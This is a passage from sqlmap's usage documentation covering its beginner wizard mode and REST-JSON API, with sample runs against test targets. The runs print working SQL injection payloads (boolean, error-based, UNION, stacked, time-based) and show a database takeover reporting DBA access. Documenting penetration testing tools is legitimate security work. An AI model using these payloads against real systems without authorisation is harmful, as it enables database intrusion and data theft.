2646[xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
2647p/output/testphp.vulnweb.com'
2648sqlmap-shell> exit
2649```
2650
2651### Simple wizard interface for beginner users
2652
2653Switch: `--wizard`
2654
2655For beginner users there is a wizard interface which uses a simple workflow with as little questions as possible. If user just enters target URL and uses default answers (e.g. by pressing `Enter`) he should have a properly set sqlmap run environment by the end of the workflow.
2656
2657Example against a Microsoft SQL Server target:
2658
2659```
2660$ python sqlmap.py --wizard
2661
2662 sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
2663 http://sqlmap.org
2664
2665[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
2666 consent is illegal. It is the end user's responsibility to obey all applicable
2667local, state and federal laws. Developers assume no liability and are not respon
2668sible for any misuse or damage caused by this program
2669
2670[*] starting at xx:xx:26
2671
2672Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_in
2673t.asp?id=1
2674POST data (--data) [Enter for None]:
2675Injection difficulty (--level/--risk). Please choose:
2676[1] Normal (default)
2677[2] Medium
2678[3] Hard
2679> 1
2680Enumeration (--banner/--current-user/etc). Please choose:
2681[1] Basic (default)
2682[2] Smart
2683[3] All
2684> 1
2685
2686sqlmap is running, please wait..
2687
2688heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
2689erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
2690do you want to include all tests for 'Microsoft SQL Server' extending provided l
2691evel (1) and risk (1)? [Y/n] Y
2692GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
2693)? [y/N] N
2694sqlmap identified the following injection points with a total of 25 HTTP(s) requ
2695ests:
2696---
2697Place: GET
2698Parameter: id
2699 Type: boolean-based blind
2700 Title: AND boolean-based blind - WHERE or HAVING clause
2701 Payload: id=1 AND 2986=2986
2702
2703 Type: error-based
2704 Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
2705 Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+C
2706HAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58
2707)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))
2708
2709 Type: UNION query
2710 Title: Generic UNION query (NULL) - 3 columns
2711 Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(1
271200)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+
2713CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--
2714
2715 Type: stacked queries
2716 Title: Microsoft SQL Server/Sybase stacked queries
2717 Payload: id=1; WAITFOR DELAY '0:0:5'--
2718
2719 Type: AND/OR time-based blind
2720 Title: Microsoft SQL Server/Sybase time-based blind
2721 Payload: id=1 WAITFOR DELAY '0:0:5'--
2722
2723 Type: inline query
2724 Title: Microsoft SQL Server/Sybase inline queries
2725 Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT
2726(CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR
2727(109)+CHAR(113)+CHAR(58))
2728---
2729web server operating system: Windows XP
2730web application technology: ASP, Microsoft IIS 5.1
2731back-end DBMS operating system: Windows XP Service Pack 2
2732back-end DBMS: Microsoft SQL Server 2005
2733banner:
2734---
2735Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2736 Oct 14 2005 00:33:37
2737 Copyright (c) 1988-2005 Microsoft Corporation
2738 Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
2739---
2740current user: 'sa'
2741current database: 'testdb'
2742current user is DBA: True
2743
2744[*] shutting down at xx:xx:52
2745```
2746
2747## API (REST-JSON)
2748
2749sqlmap can be run through the REST-JSON API, API (abbr. for Application Program Interface) that uses JSON for REST (abbr. for REpresentational State Transfer) communication between server and client instance(s). In plainspeak, server runs the sqlmap scan(s), while clients are setting the sqlmap options/switches and pull the results back. Main program file for running the API is `sqlmapapi.py`, while the client can also be implemented inside the arbitrary user program.
2750
2751```
2752$ python sqlmapapi.py -hh
2753Usage: sqlmapapi.py [options]
2754
2755Options:
2756 -h, --help show this help message and exit
2757 -s, --server Act as a REST-JSON API server
2758 -c, --client Act as a REST-JSON API client
2759 -H HOST, --host=HOST Host of the REST-JSON API server (default "127.0.0.1")
2760 -p PORT, --port=PORT Port of the the REST-JSON API server (default 8775)
2761 --adapter=ADAPTER Server (bottle) adapter to use (default "wsgiref")
2762```
2763
2764Server runs the `sqlmapapi.py` by using switch `-s`, client by using switch `-c`, while in both cases user can (optionally) set listening IP address with option `-H` (default `"127.0.0.1"`) and listening port with option `-p` (default `8775`). Each client's "session" can have multiple "tasks" (i.e. sqlmap scan runs), where user can arbitrary choose which task should be currently active.
2765
2766Inside the client's command line interface available commands are:
2767
2768* `help` - showing list of available commands along with basic help information
2769* `new ARGS` - starts a new scan task with provided arguments (e.g. `new -u "http://testphp.vulnweb.com/artists.php?artist=1"`)
2770* `use TASKID` - switches current context to different task (e.g. `use c04d8c5c7582efb4`)
2771* `data` - retrieves and shows data for current task
2772* `log`- retrieves and shows log for current task
2773* `status` - retrieves and shows status for current task
2774* `stop` - stops current task
2775* `kill` - kills current task
2776* `list` - displays all tasks (for current session)
2777* `flush` - flushes (i.e. deletes) all tasks
2778* `exit` - exits the client interface
2779
2780Example server run:
2781
2782```
2783$ python sqlmapapi.py -s -H "0.0.0.0"
2784[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
2785[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
2786[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
2787[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
2788[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
2789[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
2790[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
2791[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
2792[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
2793[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
2794[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages
2795```
2796
2797Example client run:
2798
2799```
2800$ python sqlmapapi.py -c -H "192.168.110.1"
2801[12:47:53] [DEBUG] Example client access from command line:
2802 $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9
2803]\{16\}') && echo $taskid
2804 $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testp
2805hp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/st
2806art
2807 $ curl http://192.168.110.1:8775/scan/$taskid/data
2808 $ curl http://192.168.110.1:8775/scan/$taskid/log
2809[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'..
2810.
2811[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
2812[12:47:53] [INFO] Type 'help' or '?' for list of available commands
2813api> ?
2814help Show this help message
2815new ARGS Start a new scan task with provided arguments (e.g. 'new -u "http://
2816testphp.vulnweb.com/artists.php?artist=1"')
2817use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4
2818')
2819data Retrieve and show data for current task
2820log Retrieve and show log for current task
2821status Retrieve and show status for current task
2822stop Stop current task
2823kill Kill current task
2824list Display all tasks
2825flush Flush tasks (delete all tasks)
2826exit Exit this client
2827api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-s
2828ession
2829[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
2830[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
2831[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
2832[12:48:10] [INFO] Scanning started
2833api (a42ddaef02e976f0)> status
2834[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
2835s
2836{
2837 "status": "running",
2838 "returncode": null,
2839 "success": true
2840}
2841api (a42ddaef02e976f0)> status
2842[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
2843s
2844{
2845 "status": "terminated",
2846 "returncode": 0,
2847 "success": true
2848}
2849api (a42ddaef02e976f0)> log
2850[12:48:55] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/log
2851{
2852 "log": [
2853 {
2854 "message": "flushing session file",
2855 "level": "INFO",
2856 "time": "12:48:10"
2857 },
2858 {
2859 "message": "testing connection to the target URL",
2860 "level": "INFO",
2861 "time": "12:48:10"
2862 },
2863 {
2864 "message": "checking if the target is protected by some kind of WAF/
2865IPS",
2866 "level": "INFO",
2867 "time": "12:48:10"
2868 },
2869 {
2870 "message": "testing if the target URL is stable",
2871 "level": "INFO",
2872 "time": "12:48:10"
2873 },
2874 {
2875 "message": "target URL is stable",
2876 "level": "INFO",
2877 "time": "12:48:11"
2878 },
2879 {
2880 "message": "testing if GET parameter 'artist' is dynamic",
2881 "level": "INFO",
2882 "time": "12:48:11"
2883 },
2884 {
2885 "message": "confirming that GET parameter 'artist' is dynamic",
2886 "level": "INFO",
2887 "time": "12:48:11"
2888 },
2889 {
2890 "message": "GET parameter 'artist' is dynamic",
2891 "level": "INFO",
2892 "time": "12:48:11"
2893 },
2894 {
2895 "message": "heuristic (basic) test shows that GET parameter 'artist'
2896 might be injectable (possible DBMS: 'MySQL')",
2897 "level": "INFO",
2898 "time": "12:48:11"
2899 },
2900 {
2901 "message": "testing for SQL injection on GET parameter 'artist'",
2902 "level": "INFO",
2903 "time": "12:48:11"
2904 },
2905 {
2906 "message": "testing 'AND boolean-based blind - WHERE or HAVING claus
2907e'",
2908 "level": "INFO",
2909 "time": "12:48:11"
2910 },
2911 {
2912 "message": "GET parameter 'artist' appears to be 'AND boolean-based
2913blind - WHERE or HAVING clause' injectable (with --string=\"hac\")",
2914 "level": "INFO",
2915 "time": "12:48:12"
2916 },
2917 {
2918 "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
2919RDER BY or GROUP BY clause (BIGINT UNSIGNED)'",
2920 "level": "INFO",
2921 "time": "12:48:12"
2922 },
2923 {
2924 "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
2925use (BIGINT UNSIGNED)'",
2926 "level": "INFO",
2927 "time": "12:48:12"
2928 },
2929 {
2930 "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
2931RDER BY or GROUP BY clause (EXP)'",
2932 "level": "INFO",
2933 "time": "12:48:12"
2934 },
2935 {
2936 "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
2937use (EXP)'",
2938 "level": "INFO",
2939 "time": "12:48:12"
2940 },
2941 {
2942 "message": "testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING,
2943 ORDER BY or GROUP BY clause (JSON_KEYS)'",
2944 "level": "INFO",
2945 "time": "12:48:12"
2946 },
2947 {
2948 "message": "testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING c
2949lause (JSON_KEYS)'",
2950 "level": "INFO",
2951 "time": "12:48:12"
2952 },
2953 {
2954 "message": "testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, O
2955RDER BY or GROUP BY clause (FLOOR)'",
2956 "level": "INFO",
2957 "time": "12:48:12"
2958 },
2959 {
2960 "message": "testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, OR
2961DER BY or GROUP BY clause (FLOOR)'",
2962 "level": "INFO",
2963 "time": "12:48:12"
2964 },
2965 {
2966 "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
2967RDER BY or GROUP BY clause (EXTRACTVALUE)'",
2968 "level": "INFO",
2969 "time": "12:48:12"
2970 },
2971 {
2972 "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
2973DER BY or GROUP BY clause (EXTRACTVALUE)'",
2974 "level": "INFO",
2975 "time": "12:48:12"
2976 },
2977 {
2978 "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
2979RDER BY or GROUP BY clause (UPDATEXML)'",
2980 "level": "INFO",
2981 "time": "12:48:12"
2982 },
2983 {
2984 "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
2985DER BY or GROUP BY clause (UPDATEXML)'",
2986 "level": "INFO",
2987 "time": "12:48:12"
2988 },
2989 {
2990 "message": "testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, O
2991RDER BY or GROUP BY clause (FLOOR)'",
2992 "level": "INFO",
2993 "time": "12:48:12"
2994 },
2995 {
2996 "message": "testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING cla
2997use (FLOOR)'",
2998 "level": "INFO",
2999 "time": "12:48:12"
3000 },
3001 {
3002 "message": "testing 'MySQL OR error-based - WHERE or HAVING clause (
3003FLOOR)'",
3004 "level": "INFO",
3005 "time": "12:48:12"
3006 },
3007 {
3008 "message": "testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (E
3009XTRACTVALUE)'",
3010 "level": "INFO",
3011 "time": "12:48:12"
3012 },
3013 {
3014 "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (B
3015IGINT UNSIGNED)'",
3016 "level": "INFO",
3017 "time": "12:48:12"
3018 },
3019 {
3020 "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (E
3021XP)'",
3022 "level": "INFO",
3023 "time": "12:48:12"
3024 },
3025 {
3026 "message": "testing 'MySQL >= 5.7.8 error-based - Parameter replace
3027(JSON_KEYS)'",
3028 "level": "INFO",
3029 "time": "12:48:12"
3030 },
3031 {
3032 "message": "testing 'MySQL >= 5.0 error-based - Parameter replace (F
3033LOOR)'",
3034 "level": "INFO",
3035 "time": "12:48:13"
3036 },
3037 {
3038 "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (U
3039PDATEXML)'",
3040 "level": "INFO",
3041 "time": "12:48:13"
3042 },
3043 {
3044 "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (E
3045XTRACTVALUE)'",
3046 "level": "INFO",
3047 "time": "12:48:13"
3048 },
3049 {
3050 "message": "testing 'MySQL inline queries'",
3051 "level": "INFO",
3052 "time": "12:48:13"
3053 },
3054 {
3055 "message": "testing 'MySQL > 5.0.11 stacked queries (comment)'",
3056 "level": "INFO",
3057 "time": "12:48:13"
3058 },
3059 {
3060 "message": "testing 'MySQL > 5.0.11 stacked queries'",
3061 "level": "INFO",
3062 "time": "12:48:13"
3063 },
3064 {
3065 "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP - c
3066omment)'",
3067 "level": "INFO",
3068 "time": "12:48:13"
3069 },
3070 {
3071 "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'",
3072 "level": "INFO",
3073 "time": "12:48:13"
3074 },
3075 {
3076 "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query - c
3077omment)'",
3078 "level": "INFO",
3079 "time": "12:48:13"
3080 },
3081 {
3082 "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query)'",
3083 "level": "INFO",
3084 "time": "12:48:13"
3085 },
3086 {
3087 "message": "testing 'MySQL >= 5.0.12 AND time-based blind'",
3088 "level": "INFO",
3089 "time": "12:48:13"
3090 },
3091 {
3092 "message": "GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AN
3093D time-based blind' injectable ",
3094 "level": "INFO",
3095 "time": "12:48:23"
3096 },
3097 {
3098 "message": "testing 'Generic UNION query (NULL) - 1 to 20 columns'",
3099 "level": "INFO",
3100 "time": "12:48:23"
3101 },
3102 {
3103 "message": "automatically extending ranges for UNION query injection
3104 technique tests as there is at least one other (potential) technique found",
3105 "level": "INFO",
3106 "time": "12:48:23"
3107 },
3108 {
3109 "message": "'ORDER BY' technique appears to be usable. This should r
3110educe the time needed to find the right number of query columns. Automatically e
3111xtending the range for current UNION query injection technique test",
3112 "level": "INFO",
3113 "time": "12:48:23"
3114 },
3115 {
3116 "message": "target URL appears to have 3 columns in query",
3117 "level": "INFO",
3118 "time": "12:48:23"
3119 },
3120 {
3121 "message": "GET parameter 'artist' is 'Generic UNION query (NULL) -
31221 to 20 columns' injectable",
3123 "level": "INFO",
3124 "time": "12:48:24"
3125 },
3126 {
3127 "message": "the back-end DBMS is MySQL",
3128 "level": "INFO",
3129 "time": "12:48:24"
3130 },
3131 {
3132 "message": "fetching banner",
3133 "level": "INFO",
3134 "time": "12:48:24"
3135 }
3136 ],
3137 "success": true
3138}
3139api (a42ddaef02e976f0)> data
3140[12:48:59] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/data
3141{
3142 "data": [
3143 {
3144 "status": 1,
3145 "type": 0,
3146 "value": [
3147 {
3148 "dbms": "MySQL",
3149 "suffix": "",
3150 "clause": [
3151 1,
3152 9
3153 ],
3154 "notes": [],
3155 "ptype": 1,
3156 "dbms_version": [
3157 ">= 5.0.12"
3158 ],
3159 "prefix": "",
3160 "place": "GET",
3161 "os": null,
3162 "conf": {
3163 "code": null,
3164 "string": "hac",
3165 "notString": null,
3166 "titles": false,
3167 "regexp": null,
3168 "textOnly": false,
3169 "optimize": false
3170 },
3171 "parameter": "artist",
3172 "data": {
3173 "1": {
3174 "comment": "",
3175 "matchRatio": 0.85,
3176 "trueCode": 200,
3177 "title": "AND boolean-based blind - WHERE or HAVING
3178clause",
3179 "templatePayload": null,
3180 "vector": "AND [INFERENCE]",
3181 "falseCode": 200,
3182 "where": 1,
3183 "payload": "artist=1 AND 2794=2794"
3184 },
3185 "5": {
3186 "comment": "",
3187 "matchRatio": 0.85,
3188 "trueCode": 200,
3189 "title": "MySQL >= 5.0.12 AND time-based blind",
3190 "templatePayload": null,
3191 "vector": "AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLE
3192EPTIME]),[RANDNUM])",
3193 "falseCode": null,
3194 "where": 1,
3195 "payload": "artist=1 AND SLEEP([SLEEPTIME])"
3196 },
3197 "6": {
3198 "comment": "[GENERIC_SQL_COMMENT]",
3199 "matchRatio": 0.85,
3200 "trueCode": null,
3201 "title": "Generic UNION query (NULL) - 1 to 20 colum
3202ns",
3203 "templatePayload": null,
3204 "vector": [
3205 2,
3206 3,
3207 "[GENERIC_SQL_COMMENT]",
3208 "",
3209 "",
3210 "NULL",
3211 2,
3212 false,
3213 false
3214 ],
3215 "falseCode": null,
3216 "where": 2,
3217 "payload": "artist=-5376 UNION ALL SELECT NULL,NULL,
3218CONCAT(0x716b706a71,0x4a754d495377744d4273616c436b4b6a504164666a5572477241596649
3219704c68614672644a477474,0x7162717171)-- aAjy"
3220 }
3221 }
3222 }
3223 ]
3224 },
3225 {
3226 "status": 1,
3227 "type": 2,
3228 "value": "5.1.73-0ubuntu0.10.04.1"
3229 }
3230 ],
3231 "success": true,
3232 "error": []
3233}
3234api (a42ddaef02e976f0)> exit
3235$
3236```
3237
3238General codes used in response JSON data:
3239
3240* `status`:
3241```
32420 - in progress
32431 - complete
3244```
3245
3246* `type`:
3247
3248```
32490 - target
32501 - techniques
32512 - dbms_fingerprint
32523 - banner
32534 - current_user
32545 - current_db
32556 - hostname
32567 - is_dba
32578 - users
32589 - passwords
325910 - privileges
326011 - roles
326112 - dbs
326213 - tables
326314 - columns
326415 - schema
326516 - count
326617 - dump_table
326718 - search
326819 - sql_query
326920 - common_tables
327021 - common_columns
327122 - file_read
327223 - file_write
327324 - os_cmd
327425 - reg_read
327526 - statements
3276```
3277
3278* `returncode`
3279
3280```
3281null - still running
32820 - ended gracefully
32831 - general error occurred
3284255 - unhandled exception
3285```